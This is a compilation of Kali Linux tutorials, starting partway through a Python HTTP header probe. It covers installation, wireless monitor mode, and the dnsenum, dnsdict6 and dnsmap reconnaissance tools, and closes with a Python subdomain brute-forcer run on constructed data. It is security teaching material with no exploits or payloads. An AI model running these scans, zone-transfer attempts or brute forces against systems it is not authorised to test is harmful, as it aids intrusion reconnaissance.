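    """Split a raw HTTP response into (status_line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_headers(headers):
    """Return (header, value) pairs that disclose the technology stack."""
    return [(name, headers[name]) for name in DISCLOSURE_HEADERS if name in headers]


def probe(host, port=80, include_host=True, timeout=5.0):
    """Send one raw request over a plain socket and return the parsed response.

    include_host=False reproduces the Host-less HTTP/1.1 probe from the text.
    """
    request = build_request(host=host if include_host else None)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


# Constructed sample response (not captured from any real host), modelled on
# what the article describes: Apache with the version hidden, X-Powered-By kept.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2014 00:00:00 GMT\r\n"
    b"Server: Apache\r\n"
    b"X-Powered-By: PleskLin\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    status, hdrs, _ = parse_response(SAMPLE_RESPONSE)
    print(status)
    for name, value in audit_headers(hdrs):
        print(f"disclosure: {name}: {value}")
```

Run against a host you are authorised to test with probe("www.example.test") and probe("www.example.test", include_host=False); the second call returns the error response the article shows in Figure 6.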


Here we have only outlined some of the steps and methodical techniques that will help you optimize your time and effort.

Learning from hacking

In the previous chapter we mentioned many times that the outcome of your work will depend, in part, on the experience and intuition you have. It’s hard to define where the line between experience and intuition is, given that, in most cases, your supposed intuition really arises from past experience. Therefore, the key to being a good pentester is experience. It is usual practice that when companies hire security professionals, they require them to have some prior proven experience, but, of course, if you have not worked in the security field before you will not have that experience. It is an infinite loop. What is the solution? Wargames! Wargames are a kind of challenge made for you to learn and have fun at the same time. Of course, you will only have fun if you are geek enough! There are several kinds of wargames. You can divide them by their architecture but also by their subject. Regarding architecture, there are wargames that are meant to be downloaded to your local machine so you can solve them offline. Other wargames are meant to be played online, so there are communities that provide online machines on which the challenge is hosted so you can access it. You can even download some wargames that are provided as virtual machines, so you have a complete laboratory with all the tools you will need. There are so many wargames that they might cover the whole field of security knowledge. You can find wargames to improve your system administration skills, about software exploitation, cryptography, protocol assessment and, of course, web application security. Given that this article has treated many web security concepts, we will talk about a wargame focused on web security. Again, the amazing people from OWASP provide us with a wonderful project. Its name: OWASP Broken Web Applications Project.
With this wargame we will have to download a virtual machine that contains several vulnerable applications. These vulnerable applications are quite different from one another. On one hand, we have the training applications, which are designed so that any user can learn what web vulnerabilities are in a friendly way. In this category you have applications such as Damn Vulnerable Web Application and OWASP WebGoat. On the other hand, we have applications that have been left vulnerable on purpose, but are more realistic than the ones in the previous category. From this category we highlight a Google project called Gruyere. Gruyere addresses a lot of concepts related to web security, such as the different kinds of XSS, CSRF, XSSI, Ajax vulnerabilities and much more. Finally, the virtual machine comes with a very interesting kind of vulnerable application: real applications such as WordPress or Joomla that are outdated and, since their software is not updated, contain real vulnerabilities that were found in the wild some time ago. So with this wargame you can go from zero to an acceptable level thanks to its all-in-one approach and incremental difficulty. If you want to get a grasp of all the wargames out there, you can find a really good resource at this site: http://www.amanhardikar.com/mindmaps/Practice.html.



Farewell

I’m glad you are still here! As you can deduce, we have only scratched the surface of the topics covered. No one will be outraged if you affirm that the Kali distribution is the best security-focused distro out there. Regarding pentesting, I hope you could grasp the idea behind it. It’s not an easy topic and it largely depends on your abilities, but being methodical is a big step towards being successful. For this reason, we encourage you to train yourself with the wargames mentioned, because unlike other careers, in the information security field you have plenty of opportunities to learn relevant subjects by yourself. Keep Hacking!

Bibliography

Chapter 1
• http://en.wikipedia.org/wiki/BackTrack
• http://en.wikipedia.org/wiki/Kali_Linux
• http://en.wikipedia.org/wiki/Kali
• http://www.kali.org/about-us/

Chapter 2
• http://www.kali.org/news/kali-linux-whats-new/
• http://docs.kali.org/category/armel-armhf
• http://docs.kali.org/category/live-build
• http://docs.kali.org/network-install/kali-linux-network-pxe-install
• http://docs.kali.org/

Chapter 3
• http://nmap.org/nsedoc/index.html
• https://www.volatilesystems.com/default/volatility

Chapter 4
• https://www.owasp.org/index.php/About_OWASP

Chapter 6
• https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

About the Author

The author is a computer engineer who, although he only finished his degree last year, has worked for two years developing system security software and doing source code reviews at a Barcelona company called Víntegris. He now works for Internet Security Auditors as a security analyst, performing security analyses of all kinds of targets. However, his passion is exploiting software and everything related to low-level software development. For this reason, in 2009 he founded the Overflowed Minds community with the idea of spreading information about this fascinating subject.



The Ultimate Installation Guide for Kali Linux by Aamir Lakhani

The Offensive Security team has released a new penetration testing Linux distribution named Kali Linux. BackTrack 5 RC3 was the last version of the BackTrack distributions. The project contributors decided that to move forward with the challenges of cyber security and modern testing, a new platform was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant file system. Kali has several advantages over the BackTrack distributions. Kali Linux comes with many more updated tools. Many of the outdated or redundant tools in BackTrack have been removed from Kali. The tools are streamlined with Debian repositories and synchronized four times a day. That means users have the latest software updates and security fixes and patches. The FHS-compliant file system translates into running most tools from anywhere on the system: there is no need to go into the pentest directory or another specific directory. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/.

Kali System Setup

Kali Linux can be downloaded in a few different ways from http://www.kali.org/downloads/. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit versions and comes preloaded with the GNOME desktop environment. If you plan on using Kali Linux on a virtual machine such as Oracle’s VirtualBox or VMWare, there is a prebuilt VM image. The advantage of downloading the VM image is that it comes preloaded with open source VM tools. If you do plan on using it specifically on VMWare, we will discuss how to update the open source VM tools to VMWare Tools later in this article.

Running Kali Linux From External Media

Kali Linux can be run without installing software on a host hard drive by accessing it from a media source such as a memory card or DVD. This is a great method to test Kali Linux with minimum hassle. Although it is a great way to test Kali Linux, you will most likely not want to run it off external media for long periods of time, because it does have some negative performance impact on the system. Some applications require and expect Kali Linux to be installed and do not work well when used from external media. Furthermore, using read-only storage media does not permit saving settings that may be required to make Kali Linux operate correctly. It’s highly recommended to install Kali Linux on a host hard drive or on a virtual machine.

Installing Kali Linux

Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you’ll need compatible computer hardware. Kali is supported on i386, amd64, and ARM platforms. At the time of writing, Kali Linux can be installed on the Galaxy Note 10.1, Raspberry Pi and Chromebooks, in addition to standard i386 and amd64 platforms. The hardware requirements are listed below, although I suggest exceeding the minimum amount by at least 3 times. The better the hardware Kali Linux runs on, the better the performance and user experience will be.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the Kali Linux Network Install.

Installation minimum requirements
• A minimum of 8 GB disk space for the Kali Linux install.
• For i386 and amd64 architectures, a minimum of 512 MB RAM.
• CD/DVD drive or USB boot support.
• You will also need an active Internet connection before installation. This is very important or you will not be able to configure any repositories during installation.

When you start Kali you will be presented with a boot/install screen (see Figure 1). You may choose which type of installation (GUI based or text based) you would like to perform.

Figure 1. Kali Linux Boot Screen

Select the local language preference, country, and keyboard preferences (see Figure 2).

Figure 2. Language Preference

Select a hostname for the Kali Linux host (see Figure 3). The default hostname is Kali.

Figure 3. Selecting a hostname for Kali

Select a password (see Figure 4). Simple passwords may not work, so choose something that has some degree of complexity.

Figure 4. Creating a root password

The next prompt asks for your time zone. Modify accordingly and select Continue. Figure 5 shows selecting Eastern Standard Time. The installer will ask you to set up your partitions (see Figure 6). If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed.


Figure 5. Setting time zones

Figure 6. Partitioning your system

Figure 7. Partition Details

Advanced users can select manual configuration to customize partitions. Kali also offers the option of using LVM, the Logical Volume Manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change after the initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process, as shown in Figure 7.

Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via the HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for your network (see Figure 8). Kali will prompt you to install GRUB (see Figure 9). GRUB is a multi-bootloader that gives the user the ability to choose which of several operating systems to boot. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the option to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system (see Figure 10).

Figure 8. Configuring a Network Mirror

Figure 9. Installing GRUB

Figure 10. Finish Installation

Kali Linux and VM Image first run

On some Kali installation methods, you will be asked to set the root password. When Kali Linux boots up, enter the root username and the password you selected (see Figure 11). If you downloaded a VM image of Kali, you will need the root password. The default user name is root and the password is: toor.



Figure 11. Booting Kali for the first time

Figure 12. Prepping Kali for VMWare Tools

Figure 13. Prepping Kali for VMWare Tools (con’t)

Kali VMWare Tools Installation

The first thing you need to do on Kali Linux is prep the system for VMWare Tools (see Figure 12). You only need to install VMWare Tools if you are installing Kali on VMWare. If you are installing Kali on other virtual platforms you do not need this step. To install VMWare Tools, issue the following commands (Note: each command is typed as one line in the terminal):


echo cups enabled >> /usr/sbin/update-rc.d
echo vmware-tools enabled >> /usr/sbin/update-rc.d
apt-get install gcc make linux-headers-$(uname -r)

Note: the following is typed as one line (see Figure 13):

ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux

Now you are ready to mount the VM Tools CD. Simply go to the menu in VMWare and install VM Tools (see Figure 14). NOTE: I did this from VMWare Fusion, but the process will be the same regardless of VMWare platform. Now go back to Kali Linux and use the following commands:

mkdir /mnt/vmware
mount /dev/cdrom /mnt/vmware/
cp -rf /mnt/vmware/VMwareTools* /tmp/

Figure 14. Loading VMWare Tools

Figure 15. Copying VMWare tools to temporary folder

Figure 16. Unpacking VMWare Tools



Figure 17. VirtualBox Guest Additions

Figure 18. VirtualBox Guest Additions

Next, you will change to the /tmp directory and run the VM Tools installation script.

cd /tmp/
tar zxpf VMwareTools-*.tar.gz
cd vmware-tools-distrib/

Lastly, type ./vmware-install.pl to run the VM Tools installation script. Follow the on-screen instructions when you run the script.

Installing Kali Linux in VirtualBox

You can also install Kali Linux on Oracle’s VirtualBox virtualization platform. VirtualBox is a popular platform because it is often distributed free under the GNU General Public License. In order to install Kali Linux, you must be using VirtualBox version 4.22 or higher.

Go through the steps described above to download the ISO image of Kali Linux and install it in VirtualBox. When Kali Linux boots up, you will need to install additional software to get full keyboard and mouse support, along with other VirtualBox features. As described in the official Kali Linux documentation (source: http://docs.kali.org/general-use/kali-linux-virtual-box-guest), once you have booted into your Kali Linux within VirtualBox, open a terminal window and issue the following command to install the Linux kernel headers:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Once this is complete you can attach the VirtualBox Guest Additions CD. Selecting Devices from the VirtualBox menu and then Install Guest Additions accomplishes this. This will mount the Guest Additions ISO on the virtual DVD drive in your Kali Linux virtual machine. When prompted to autorun the DVD, click the Cancel button (see Figure 17). From the terminal window, copy the VBoxLinuxAdditions.run file from the Guest Additions CD-ROM to a path on your local system. Ensure it is executable and run the file to begin installation.

cp /media/cd-rom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
cd /root
./VBoxLinuxAdditions.run

Reboot the Kali Linux VM to complete the Guest Additions installation (see Figure 18). You should now have full mouse and screen integration as well as the ability to share folders with the host system.

Creating Shared Folders with Kali Linux and Virtual Box In order to share folders on your host system with your Kali Linux VM, there are a few short steps that need to be completed. From the VirtualBox Manager, select your Kali Linux VM instance and click on the Shared Folders link in the right window pane. This will launch a pop up window for adding shared folders. Within this window click the icon to add a folder (see Figure 19).

Figure 19. VirtualBox Shared Folders Host Configuration

In the Folder Path text box, provide the path to the folder you would like to share, or click the drop-down arrow to browse your host system for the path. Select the check boxes that allow for Auto-mount and Make Permanent and click the OK button both times when prompted. Your shared folders will now be available in the media directory. You can create a bookmark or a link for easier access to the directory (see Figure 20).

Figure 20. VirtualBox Shared Folders

Figure 21. Alfa Wireless Card



Installing a Wireless Adapter on Kali Linux

Kali Linux has numerous wireless testing tools. Installing a wireless card to be used for wireless testing with Kali Linux is a straightforward task as long as you are using a card that is supported by Kali Linux. My favourite adapters are the Alfa brand of cards (see Figure 21). I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH adapter because it’s a dual band adapter. However, this card is very difficult to find since it is no longer made, but you may have luck on eBay and other places.

Figure 22. iwconfig command

The iwconfig command will show any wireless cards in the system. I am using a RealTek wireless card. Linux ships with the RealTek drivers, making it a plug and play wireless card on Linux. The operating system recognizes a wireless interface named wlan0. My next step is to enable the wireless interface. This is accomplished by issuing the ifconfig command (see Figure 23).

ifconfig wlan0 up

Figure 23. ifconfig wlan command

I need to know which wireless networks my wireless card sees. I issue the iwlist command (see Figure 24).

iwlist wlan0 scanning

Figure 24. iwlist scanning command

This command forces the wireless card to scan and report on all wireless networks in the vicinity (see Figure 25). As you can see from the example above, the command found my target network: Wireless Lab. It has also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password). Secondly, we see the AP is transmitting on channel 36. This is important because it allows us to be specific about which wireless channel we want our wireless card to monitor and capture traffic from. The next step is to change the wireless card to monitor mode. This will allow the wireless card to examine all the packets in the air. We do this by creating a monitor interface using airmon-ng (see Figure 26). Issue the airmon-ng command to verify that airmon-ng sees your wireless card. From that point, create the monitor interface by issuing the command: airmon-ng start wlan0.



Figure 25. iwlist results

Figure 26. Creating a wireless promiscuous interface

Figure 27. ifconfig

Next, run the ifconfig command to verify that the monitor interface has been created (see Figure 27). We can see that mon0 is created. Now verify the mon0 interface itself (see Figure 28).

Figure 28. mon0 – Wireless Promiscuous Interface

Kali Linux now has a wireless interface in monitor mode. You should be able to use most of the wireless tools found in Kali.


Kali Toolset Overview

Kali Linux offers a number of customized tools designed for penetration testing. Tools are categorized in the following groups, as seen in the dropdown menu shown in Figure 29.

Information Gathering

These are reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to identifying the protocols used.

Vulnerability Analysis

Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering reconnaissance tools.

Web Applications

These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this book come directly from this category. Although “web applications” does not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section.

Password Attacks

This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication.

Figure 29. Kali Menu

Wireless Attacks

These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that Kali can put into promiscuous mode.

Exploitation Tools

These are tools used to exploit vulnerabilities found in systems. Usually the vulnerability is identified during a vulnerability assessment of a target.

Sniffing and Spoofing

These are tools used for network packet captures, network packet manipulation, packet crafting, and web spoofing. There are also a few VoIP reconstruction applications.

Maintaining Access

Maintaining access tools are used once a foothold is established in a target system or network. It is common to find compromised systems with multiple hooks back to the attacker to provide alternative routes in case the vulnerability used by the attacker is found and remediated.

Reverse Engineering

These tools are used to disassemble executables and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to the development of other programs. Reverse engineering is also used for malware analysis to determine what an executable does, or by researchers to attempt to find vulnerabilities in software applications.

Stress Testing

Stress testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems, such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a Denial of Service attack).

Hardware Hacking

This section contains Android tools, which could be classified as mobile, and Arduino tools that are used for programming and controlling other small electronic devices.

Forensics

Forensics tools are used to monitor and analyze computer network traffic and applications.

Reporting Tools

Reporting tools are methods to deliver information found during a penetration exercise.

System Services

This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH.

NOTE: There are other tools included in the Kali Linux build such as web browsers, quick links to tune how the Kali Linux build is seen on the network, search tools, and other useful applications.

Updating Kali Linux

After you have Kali Linux set up, you will want to update the packages. You do so by issuing the apt-get update command (see Figure 30). Next, issue the apt-get upgrade command. You may be asked to confirm disk space and other warning messages. Type Y to continue (see Figure 31).

Figure 30. apt-get update command

Figure 31. apt-get upgrade command


Figure 32. updatedb command

Finally, run the updatedb command from a terminal window (see Figure 32). This command ensures the applications are in the Kali file database and can be found when a user executes the locate command.

Summary Congratulations, you have successfully installed and updated Kali Linux. Kali is a powerful penetration platform. I recommend that you play around with Kali. You will find some key differences between BackTrack and Kali, and some of these differences take time to learn. However, I am sure you will appreciate the power and flexibility of the platform. Happy hacking!

About the Author

Aamir Lakhani is a leading cyber security architect. Lakhani is responsible for providing IT security solutions to major commercial and federal enterprise organizations around the world. Lakhani leads projects that implement security postures for Fortune 500 companies, the US Department of Defense, major healthcare providers, educational institutions, and financial and media organizations. Lakhani has designed offensive counter-defense measures for defense and intelligence agencies, and has assisted organizations in defending themselves from active strike-back attacks perpetrated by underground cyber groups. Lakhani is considered an industry leader in support of detailed architectural engagements and projects on topics related to cyber defense, mobile application threats, malware and Advanced Persistent Threat (APT) research, and Dark Security. Lakhani is the author of the soon-to-be-released book Web Penetration Testing with Kali Linux, in conjunction with Packt Publishing. Writing under the pseudonym Dr. Chaos, Lakhani also operates the DrChaos.com blog. In its recent list of 46 Federal Technology Experts to Follow on Twitter, FedTech magazine described Aamir Lakhani as “a blogger, infosec specialist, super hero...and all around good guy.” World Wide Technology, Inc. (WWT) is a leading systems integrator providing technology products, services, and supply chain solutions to customers around the globe. WWT understands today’s advanced technologies, including Unified Communications, Security, Data Center, Wireless Mobility, and eCommerce. When properly planned, procured, and deployed, these business solutions reduce costs, increase profitability and ultimately improve a company’s ability to effectively serve its customers. Founded in 1990, WWT has grown from a small startup to a world-class organization exceeding $5 billion in revenue and over 2,200 highly trained employees.
WWT continues to achieve consistent financial growth and provide our partners with uncommon strength and stability.


KALI LINUX THE ULTIMATE GUIDE

How to Find Files in Kali Linux by Rajesh Kumar In this tutorial I will show how you can find a file, or the path of a tool, on the system. I will not make it more complicated than it needs to be: just a few useful and easy commands that will help you in your everyday Linux work. Kali ships hundreds of tools, and not all of them are on your PATH, so knowing how to locate a binary quickly saves time during an assessment.

Step 1. find

Find one or more files when you know their approximate filenames (Figure 1). find walks the filesystem at the moment you run it, so its results are always current, but searching from / can take a while.

Syntax – find / -name 'file name'

Example – find / -name mrquiety.txt

Figure 1. find command

In the above example, the system searches for any file named mrquiety.txt in the root directory and every subdirectory beneath it. Add 2>/dev/null to the end of the command if you want to hide the "Permission denied" messages that appear for directories you are not allowed to read.

Step 2. locate

Lists files whose names match a pattern (Figure 2). Unlike find, locate does not walk the disk: it searches a database of filenames that is rebuilt periodically by updatedb. That makes it very fast, but files created since the last updatedb run will not appear until you run updatedb again.

Syntax – locate 'name'

Example – locate dnsenum

Figure 2. locate command

In the above example, the system lists every path on the local machine whose name contains dnsenum.

Step 3. whereis

Locates the binary, source, and manual page files for a command (Figure 3). It only looks in the standard directories (such as /usr/bin and /usr/share/man), so it is the quickest way to check where an installed tool lives.

Syntax – whereis 'name'

Example – whereis dnsenum

Figure 3. whereis command

How to Use Detect_sniffer6 by Rajesh Kumar Sniffing detection means finding out whether any host on your network segment is capturing traffic. The property that most detection techniques rely on is that a sniffer puts the network card into promiscuous mode, so the card passes every frame it sees up to the operating system instead of only the frames addressed to its own MAC address. A host with a full TCP/IP stack in that mode will process, and may answer, packets that it should have ignored, and that is the behaviour a tool such as detect_sniffer6 looks for (stackoverflow.com). Two caveats: the test only covers hosts on the same link as the Kali machine, and a purely passive tap or a capture box with no IP stack on the monitored interface will never answer, so a clean result does not prove nobody is listening.

Step 1. How to open detect_sniffer6

A. GUI method (Figure 1). Applications → Kali Linux → Information Gathering → Live Host Identification → detect_sniffer6

Figure 1. Opening detect_sniffer6 in the GUI

B. Open the terminal, type detect_sniffer6, and hit Enter (Figure 2).

Figure 2. Opening detect_sniffer6 in the terminal


Step 2. This is our BackTrack 5 machine, which will be the target. Here, we are running Wireshark on it so that there is a sniffer for Kali Linux to detect. If you want to follow this tutorial, start Wireshark (or any other capture tool that puts the interface in promiscuous mode) on the target before the next step (Figure 3).

Figure 3. Wireshark

Step 3. In Kali Linux, we run the command detect_sniffer6 eth0 (here, eth0 is the name of Kali's network interface, see Figure 4) and the tool reports the IPv6 address of our target (Figure 5). The target shows up because it answered a frame that a host in normal mode would have discarded.

Syntax – detect_sniffer6 interface name

Example – detect_sniffer6 eth0

Figure 4. detect_sniffer6 eth0 command

Figure 5. IPv6 address found


How to Use DNSenum in Kali Linux by Rajesh Kumar DNSenum is a tool written in Perl that was designed to enumerate DNS information about a domain. With it we can do the following:

1. Get the host's address
2. Get the name servers
3. Get the MX records
4. Try zone transfers against each name server
5. Get the BIND version
6. Get extra names and subdomains via Google scraping
7. Brute force subdomains from a file; it can also recurse into subdomains that have their own NS records
8. Perform reverse lookups on the discovered netranges
9. Write the ip-blocks it found to the file domain_ips.txt

Zone transfers (item 4) are the one step to pay attention to: a name server that allows AXFR to anyone hands over the entire zone at once, so a successful transfer is a finding in its own right, not just a data source.

Step 1. How to open DNSenum

a. GUI method (Figure 1). Applications → Kali Linux → Information Gathering → DNS Analysis → dnsenum

Figure 1. Opening DNSenum from the GUI

b. Open the terminal, type dnsenum, and hit Enter. Read through all of the options it prints (Figure 2).

Figure 2. Opening DNSenum from the terminal

Step 2. In the terminal, type dnsenum followed by the domain, and hit Enter, for example dnsenum facebook.com. After pressing Enter, you will see all the information: the host's address, name servers, MX records, the result of the zone transfer attempts, and so on. Note: do not put www in front of the domain; dnsenum wants the zone name, and www.example.com would make it enumerate the wrong zone (Figures 3 & 4).

Figure 3. Valuable information about the domain gained

Figure 4. More valuable information

Step 3. Extra names and subdomains via Google scraping. Most of the time this does not work, and it does not work with all domains (Figure 5). The relevant options are:

-p, --pages <value> The number of Google search pages to process when scraping names; the default is 20 pages. The -s switch must be specified.

-s, --scrap <value> The maximum number of subdomains that will be scraped from Google.

Figure 5. Extra names and subdomains via Google scraping

NOTE: Since this is not functional, you can run the equivalent query manually in a Google search: "allinurl: -www site:DOMAIN-NAME-HERE".

Step 4. Brute forcing subdomains.

-f, --file <file> Read subdomains from this file to perform brute force (Figure 6).

Brute forcing is the step that still works when zone transfers are refused and scraping returns nothing, but the result is only as good as the wordlist, and a domain with a wildcard record will make every guess appear to resolve, so check a few of the hits by hand before trusting the list.

Figure 6. Brute forcing subdomains

How to Use Dnsdict6 and Get the IPv6/IPv4 Address of a Domain by Rajesh Kumar Dnsdict6 is an information gathering tool from the THC-IPv6 suite that is used to enumerate the DNS names of a domain. Dnsdict6 guesses subdomain names from a built-in dictionary and reports every one that resolves, so as a result it can show you how many subdomains are available under a domain, together with their IPv6 and, on request, IPv4 addresses. The tool is useful because it also turns up subdomains that are not linked from anywhere and are therefore invisible to ordinary users and crawlers. Overall, this is a nice tool for gathering information about a domain.

Step 1. How to open Dnsdict6

A. GUI method (Figure 1). Applications → Kali Linux → Information Gathering → DNS Analysis → dnsdict6

Figure 1. Opening Dnsdict6 from the GUI

B. Open the terminal, type dnsdict6, and hit Enter (Figure 2).

Figure 2. Opening Dnsdict6 from the terminal


Step 2. This command is used to extract subdomains of google.com with their IPv4 and IPv6 information (Figure 3).

Syntax – dnsdict6 domain name

Example – dnsdict6 google.com

Figure 3. Extracting subdomains with their IPv6/IPv4 information

Step 3. Check one more command: dnsdict6 -d -4 google.com (domain name). Here, -d is used to display information on the name servers and MX records of the domain, and -4 is used to also dump IPv4 addresses (Figure 4).

Figure 4. Gathering Name Servers, MX Records, and IPv4/IPv6 addresses

How to Use Dnsmap in Kali Linux by Rajesh Kumar Dnsmap is described as a passive DNS network mapper and is better known as a subdomain brute forcer. It is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. The tool discovers subdomains associated with a given domain by guessing names and resolving them; "passive" here means that the only traffic it generates is DNS queries, so the target's hosts are never contacted directly. Subdomain brute forcing is especially useful when other techniques, such as zone transfers, do not work. With it we can find remote access servers, misconfigured servers, and new domain names that lead you to non-obvious, hard-to-find network blocks.

Some features:

• IPv6 support
• Obtains all IP addresses (A records) associated with each successfully brute forced subdomain, rather than just one IP address per subdomain
• Discovers embedded devices configured with dynamic DNS services
• Brute forcing with a user-supplied wordlist
• Saves the results in human-readable and CSV format for easy processing

Step 1. How to open dnsmap

A. GUI method (Figure 1). Applications → Kali Linux → Information Gathering → DNS Analysis → dnsmap

Figure 1. Opening dnsmap in the GUI

B. Open the terminal, type dnsmap, and hit Enter (Figure 2).

Figure 2. Opening dnsmap in the terminal

Step 2. This command is used to start brute forcing the domain with dnsmap's built-in wordlist (Figure 3).

Syntax – dnsmap domain name

Example – dnsmap google.com

Figure 3. Starting a brute force on the target domain

Step 3. This command is used to save the results in a text file (Figure 4).

Syntax – dnsmap domain name -r path

Example – dnsmap google.com -r /root/

Figure 4. Saving the result in a text file

3A. You can see your saved file here (Figure 5).

Figure 5. Saved file visible in the Home folder

Step 4. This command is used to save the results in a CSV file (Figure 6).

Syntax – dnsmap domain name -c path

Example – dnsmap google.com -c /root/

Figure 6. Saving results as a CSV file

4A. You can see your saved file here (Figure 7).

Figure 7. CSV file saved and visible in the Home folder
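The three brute forcers covered above (dnsenum with -f, dnsdict6, and dnsmap) all do the same core job: take a wordlist, resolve each candidate name, and keep the ones that answer. The example below is added here to show that logic in working code; it is not code from the article or from any of those tools. It shows the two details a practitioner cares about that the screenshots cannot: collecting every A and AAAA record for a hit instead of one address (dnsmap's "all IP addresses" feature), and detecting a wildcard DNS record by resolving random labels first, so that a wildcard zone does not turn every word in the list into a false positive. The resolver is injected as a function, and the zone data (example.com, the 192.0.2.0/24 and 2001:db8:: documentation ranges) is constructed for offline use; a real run would replace fake_resolve with a wrapper around socket.getaddrinfo or dnspython.

```python
"""Subdomain brute force with wildcard filtering and CSV output.

Added example; not from the article, dnsenum, dnsdict6 or dnsmap.
"""
import csv
import io
import secrets
from typing import Callable, Dict, List, Set

# A resolver is modelled as (name, rrtype) -> list of addresses; [] means
# NXDOMAIN or no data. Injecting it keeps the example runnable offline.
Resolver = Callable[[str, str], List[str]]
RRTYPES = ("A", "AAAA")


def wildcard_addresses(resolve: Resolver, domain: str, rrtype: str,
                       probes: int = 2) -> Set[str]:
    """Resolve random labels that cannot legitimately exist. Whatever they
    return is the zone's wildcard answer for this record type (an empty set
    means there is no wildcard to worry about)."""
    found: Set[str] = set()
    for _ in range(probes):
        label = secrets.token_hex(8)  # 16 random hex chars, e.g. 3f9a...
        found.update(resolve(f"{label}.{domain}", rrtype))
    return found


def brute_force(resolve: Resolver, domain: str,
                wordlist: List[str]) -> Dict[str, Dict[str, List[str]]]:
    """Return {fqdn: {"A": [...], "AAAA": [...]}} for every candidate that
    resolves to something other than the wildcard answer."""
    wild = {rr: wildcard_addresses(resolve, domain, rr) for rr in RRTYPES}
    results: Dict[str, Dict[str, List[str]]] = {}
    for word in wordlist:
        fqdn = f"{word.strip().lower()}.{domain}"
        records: Dict[str, List[str]] = {}
        for rr in RRTYPES:
            # keep all addresses, minus those that are just the wildcard
            addrs = sorted(set(resolve(fqdn, rr)) - wild[rr])
            if addrs:
                records[rr] = addrs
        if records:
            results[fqdn] = records
    return results


def to_csv(results: Dict[str, Dict[str, List[str]]]) -> str:
    """One row per (hostname, record type, address), like dnsmap -c."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["hostname", "type", "address"])
    for fqdn in sorted(results):
        for rr, addrs in sorted(results[fqdn].items()):
            for addr in addrs:
                writer.writerow([fqdn, rr, addr])
    return buf.getvalue()


# Constructed zone for offline use. example.com has a wildcard A record, so
# every unknown name answers 192.0.2.250: the classic brute-force trap.
FAKE_ZONE = {
    ("www.example.com", "A"): ["192.0.2.11", "192.0.2.10"],
    ("www.example.com", "AAAA"): ["2001:db8::10"],
    ("mail.example.com", "A"): ["192.0.2.20"],
    ("vpn.example.com", "A"): ["192.0.2.250"],  # real host on the wildcard IP
    ("ns1.example.com", "AAAA"): ["2001:db8::53"],
}


def fake_resolve(name: str, rrtype: str) -> List[str]:
    """Stand-in resolver over FAKE_ZONE (constructed data, not live DNS)."""
    if (name, rrtype) in FAKE_ZONE:
        return list(FAKE_ZONE[(name, rrtype)])
    if rrtype == "A" and name.endswith(".example.com"):
        return ["192.0.2.250"]  # wildcard answer for any other label
    return []


if __name__ == "__main__":
    words = ["www", "mail", "vpn", "ns1", "dev", "staging"]
    print(to_csv(brute_force(fake_resolve, "example.com", words)))
```

Note what the wildcard filter costs you: vpn.example.com is a real host, but because it sits on the same address as the wildcard it is indistinguishable from noise and is dropped, exactly as it would be with dnsmap's -i option for ignoring addresses. When a zone uses wildcards, treat the filtered list as a lower bound and confirm interesting names with a second signal (a different record type, a banner, or a certificate name).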
